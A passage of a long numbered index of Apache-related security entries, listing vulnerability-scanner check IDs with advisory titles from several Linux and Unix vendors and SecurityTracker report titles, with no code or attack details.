12676| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
12677| [850088] SuSE Update for apache2 SUSE-SA:2007:061
12678| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
12679| [841209] Ubuntu Update for apache2 USN-1627-1
12680| [840900] Ubuntu Update for apache2 USN-1368-1
12681| [840798] Ubuntu Update for apache2 USN-1259-1
12682| [840734] Ubuntu Update for apache2 USN-1199-1
12683| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
12684| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
12685| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
12686| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
12687| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
12688| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
12689| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
12690| [835253] HP-UX Update for Apache Web Server HPSBUX02645
12691| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
12692| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
12693| [835236] HP-UX Update for Apache with PHP HPSBUX02543
12694| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
12695| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
12696| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
12697| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
12698| [835188] HP-UX Update for Apache HPSBUX02308
12699| [835181] HP-UX Update for Apache With PHP HPSBUX02332
12700| [835180] HP-UX Update for Apache with PHP HPSBUX02342
12701| [835172] HP-UX Update for Apache HPSBUX02365
12702| [835168] HP-UX Update for Apache HPSBUX02313
12703| [835148] HP-UX Update for Apache HPSBUX01064
12704| [835139] HP-UX Update for Apache with PHP HPSBUX01090
12705| [835131] HP-UX Update for Apache HPSBUX00256
12706| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
12707| [835104] HP-UX Update for Apache HPSBUX00224
12708| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
12709| [835101] HP-UX Update for Apache HPSBUX01232
12710| [835080] HP-UX Update for Apache HPSBUX02273
12711| [835078] HP-UX Update for ApacheStrong HPSBUX00255
12712| [835044] HP-UX Update for Apache HPSBUX01019
12713| [835040] HP-UX Update for Apache PHP HPSBUX00207
12714| [835025] HP-UX Update for Apache HPSBUX00197
12715| [835023] HP-UX Update for Apache HPSBUX01022
12716| [835022] HP-UX Update for Apache HPSBUX02292
12717| [835005] HP-UX Update for Apache HPSBUX02262
12718| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
12719| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
12720| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
12721| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
12722| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
12723| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
12724| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
12725| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
12726| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
12727| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
12728| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
12729| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
12730| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
12731| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
12732| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
12733| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
12734| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
12735| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
12736| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
12737| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
12738| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
12739| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
12740| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
12741| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
12742| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
12743| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
12744| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
12745| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
12746| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
12747| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
12748| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
12749| [801942] Apache Archiva Multiple Vulnerabilities
12750| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
12751| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
12752| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
12753| [801284] Apache Derby Information Disclosure Vulnerability
12754| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
12755| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
12756| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
12757| [800680] Apache APR Version Detection
12758| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
12759| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
12760| [800677] Apache Roller Version Detection
12761| [800279] Apache mod_jk Module Version Detection
12762| [800278] Apache Struts Cross Site Scripting Vulnerability
12763| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
12764| [800276] Apache Struts Version Detection
12765| [800271] Apache Struts Directory Traversal Vulnerability
12766| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
12767| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
12768| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
12769| [103122] Apache Web Server ETag Header Information Disclosure Weakness
12770| [103074] Apache Continuum Cross Site Scripting Vulnerability
12771| [103073] Apache Continuum Detection
12772| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
12773| [101023] Apache Open For Business Weak Password security check
12774| [101020] Apache Open For Business HTML injection vulnerability
12775| [101019] Apache Open For Business service detection
12776| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
12777| [100923] Apache Archiva Detection
12778| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
12779| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
12780| [100813] Apache Axis2 Detection
12781| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
12782| [100795] Apache Derby Detection
12783| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
12784| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
12785| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
12786| [100514] Apache Multiple Security Vulnerabilities
12787| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
12788| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
12789| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
12790| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
12791| [72626] Debian Security Advisory DSA 2579-1 (apache2)
12792| [72612] FreeBSD Ports: apache22
12793| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
12794| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
12795| [71512] FreeBSD Ports: apache
12796| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
12797| [71256] Debian Security Advisory DSA 2452-1 (apache2)
12798| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
12799| [70737] FreeBSD Ports: apache
12800| [70724] Debian Security Advisory DSA 2405-1 (apache2)
12801| [70600] FreeBSD Ports: apache
12802| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
12803| [70235] Debian Security Advisory DSA 2298-2 (apache2)
12804| [70233] Debian Security Advisory DSA 2298-1 (apache2)
12805| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
12806| [69338] Debian Security Advisory DSA 2202-1 (apache2)
12807| [67868] FreeBSD Ports: apache
12808| [66816] FreeBSD Ports: apache
12809| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
12810| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
12811| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
12812| [66081] SLES11: Security update for Apache 2
12813| [66074] SLES10: Security update for Apache 2
12814| [66070] SLES9: Security update for Apache 2
12815| [65998] SLES10: Security update for apache2-mod_python
12816| [65893] SLES10: Security update for Apache 2
12817| [65888] SLES10: Security update for Apache 2
12818| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
12819| [65510] SLES9: Security update for Apache 2
12820| [65472] SLES9: Security update for Apache
12821| [65467] SLES9: Security update for Apache
12822| [65450] SLES9: Security update for apache2
12823| [65390] SLES9: Security update for Apache2
12824| [65363] SLES9: Security update for Apache2
12825| [65309] SLES9: Security update for Apache and mod_ssl
12826| [65296] SLES9: Security update for webdav apache module
12827| [65283] SLES9: Security update for Apache2
12828| [65249] SLES9: Security update for Apache 2
12829| [65230] SLES9: Security update for Apache 2
12830| [65228] SLES9: Security update for Apache 2
12831| [65212] SLES9: Security update for apache2-mod_python
12832| [65209] SLES9: Security update for apache2-worker
12833| [65207] SLES9: Security update for Apache 2
12834| [65168] SLES9: Security update for apache2-mod_python
12835| [65142] SLES9: Security update for Apache2
12836| [65136] SLES9: Security update for Apache 2
12837| [65132] SLES9: Security update for apache
12838| [65131] SLES9: Security update for Apache 2 oes/CORE
12839| [65113] SLES9: Security update for apache2
12840| [65072] SLES9: Security update for apache and mod_ssl
12841| [65017] SLES9: Security update for Apache 2
12842| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
12843| [64783] FreeBSD Ports: apache
12844| [64774] Ubuntu USN-802-2 (apache2)
12845| [64653] Ubuntu USN-813-2 (apache2)
12846| [64559] Debian Security Advisory DSA 1834-2 (apache2)
12847| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
12848| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
12849| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
12850| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
12851| [64443] Ubuntu USN-802-1 (apache2)
12852| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
12853| [64423] Debian Security Advisory DSA 1834-1 (apache2)
12854| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
12855| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
12856| [64251] Debian Security Advisory DSA 1816-1 (apache2)
12857| [64201] Ubuntu USN-787-1 (apache2)
12858| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
12859| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
12860| [63565] FreeBSD Ports: apache
12861| [63562] Ubuntu USN-731-1 (apache2)
12862| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
12863| [61185] FreeBSD Ports: apache
12864| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
12865| [60387] Slackware Advisory SSA:2008-045-02 apache
12866| [58826] FreeBSD Ports: apache-tomcat
12867| [58825] FreeBSD Ports: apache-tomcat
12868| [58804] FreeBSD Ports: apache
12869| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
12870| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
12871| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
12872| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
12873| [57335] Debian Security Advisory DSA 1167-1 (apache)
12874| [57201] Debian Security Advisory DSA 1131-1 (apache)
12875| [57200] Debian Security Advisory DSA 1132-1 (apache2)
12876| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
12877| [57145] FreeBSD Ports: apache
12878| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
12879| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
12880| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
12881| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
12882| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
12883| [56067] FreeBSD Ports: apache
12884| [55803] Slackware Advisory SSA:2005-310-04 apache
12885| [55519] Debian Security Advisory DSA 839-1 (apachetop)
12886| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
12887| [55355] FreeBSD Ports: apache
12888| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
12889| [55261] Debian Security Advisory DSA 805-1 (apache2)
12890| [55259] Debian Security Advisory DSA 803-1 (apache)
12891| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
12892| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
12893| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
12894| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
12895| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
12896| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
12897| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
12898| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
12899| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
12900| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
12901| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
12902| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
12903| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
12904| [54439] FreeBSD Ports: apache
12905| [53931] Slackware Advisory SSA:2004-133-01 apache
12906| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
12907| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
12908| [53878] Slackware Advisory SSA:2003-308-01 apache security update
12909| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
12910| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
12911| [53848] Debian Security Advisory DSA 131-1 (apache)
12912| [53784] Debian Security Advisory DSA 021-1 (apache)
12913| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
12914| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
12915| [53735] Debian Security Advisory DSA 187-1 (apache)
12916| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
12917| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
12918| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
12919| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
12920| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
12921| [53282] Debian Security Advisory DSA 594-1 (apache)
12922| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
12923| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
12924| [53215] Debian Security Advisory DSA 525-1 (apache)
12925| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
12926| [52529] FreeBSD Ports: apache+ssl
12927| [52501] FreeBSD Ports: apache
12928| [52461] FreeBSD Ports: apache
12929| [52390] FreeBSD Ports: apache
12930| [52389] FreeBSD Ports: apache
12931| [52388] FreeBSD Ports: apache
12932| [52383] FreeBSD Ports: apache
12933| [52339] FreeBSD Ports: apache+mod_ssl
12934| [52331] FreeBSD Ports: apache
12935| [52329] FreeBSD Ports: ru-apache+mod_ssl
12936| [52314] FreeBSD Ports: apache
12937| [52310] FreeBSD Ports: apache
12938| [15588] Detect Apache HTTPS
12939| [15555] Apache mod_proxy content-length buffer overflow
12940| [15554] Apache mod_include priviledge escalation
12941| [14771] Apache <= 1.3.33 htpasswd local overflow
12942| [14177] Apache mod_access rule bypass
12943| [13644] Apache mod_rootme Backdoor
12944| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
12945| [12280] Apache Connection Blocking Denial of Service
12946| [12239] Apache Error Log Escape Sequence Injection
12947| [12123] Apache Tomcat source.jsp malformed request information disclosure
12948| [12085] Apache Tomcat servlet/JSP container default files
12949| [11438] Apache Tomcat Directory Listing and File disclosure
12950| [11204] Apache Tomcat Default Accounts
12951| [11092] Apache 2.0.39 Win32 directory traversal
12952| [11046] Apache Tomcat TroubleShooter Servlet Installed
12953| [11042] Apache Tomcat DOS Device Name XSS
12954| [11041] Apache Tomcat /servlet Cross Site Scripting
12955| [10938] Apache Remote Command Execution via .bat files
12956| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
12957| [10773] MacOS X Finder reveals contents of Apache Web files
12958| [10766] Apache UserDir Sensitive Information Disclosure
12959| [10756] MacOS X Finder reveals contents of Apache Web directories
12960| [10752] Apache Auth Module SQL Insertion Attack
12961| [10704] Apache Directory Listing
12962| [10678] Apache /server-info accessible
12963| [10677] Apache /server-status accessible
12964| [10440] Check for Apache Multiple / vulnerability
12965|
12966| SecurityTracker - https://www.securitytracker.com:
12967| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
12968| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
12969| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
12970| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
12971| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
12972| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
12973| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
12974| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
12975| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
12976| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
12977| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
12978| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
12979| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
12980| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
12981| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
12982| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
12983| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
12984| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
12985| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
12986| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
12987| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
12988| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
12989| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
12990| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
12991| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
12992| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
12993| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
12994| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
12995| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
12996| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
12997| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
12998| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
12999| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
13000| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
13001| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
13002| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
13003| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
13004| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
13005| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
13006| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
13007| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
13008| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
13009| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
13010| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
13011| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
13012| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
13013| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
13014| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
13015| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
13016| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
13017| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
13018| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
13019| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
13020| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
13021| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
13022| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
13023| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
13024| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
13025| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
13026| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
13027| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
13028| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
13029| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
13030| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
13031| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
13032| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
13033| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
13034| [1024096] Apache mod_proxy_http May Return Results for a Different Request
13035| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
13036| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
13037| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
13038| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
13039| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
13040| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
13041| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
13042| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
13043| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
13044| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
13045| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
13046| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
13047| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
13048| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
13049| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
13050| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
13051| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
13052| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
13053| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
13054| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
13055| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
13056| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
13057| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
13058| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
13059| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
13060| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
13061| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
13062| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
13063| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
13064| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
13065| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
13066| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
13067| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
13068| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
13069| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
13070| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
13071| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
13072| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
13073| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
13074| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
13075| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
13076| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
13077| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
13078| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
13079| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
13080| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
13081| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
13082| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
13083| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
13084| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
13085| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
13086| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
13087| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
13088| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
13089| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
13090| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
13091| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
13092| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
13093| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
13094| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
13095| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
13096| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
13097| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
13098| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
13099| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
13100| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
13101| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
13102| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
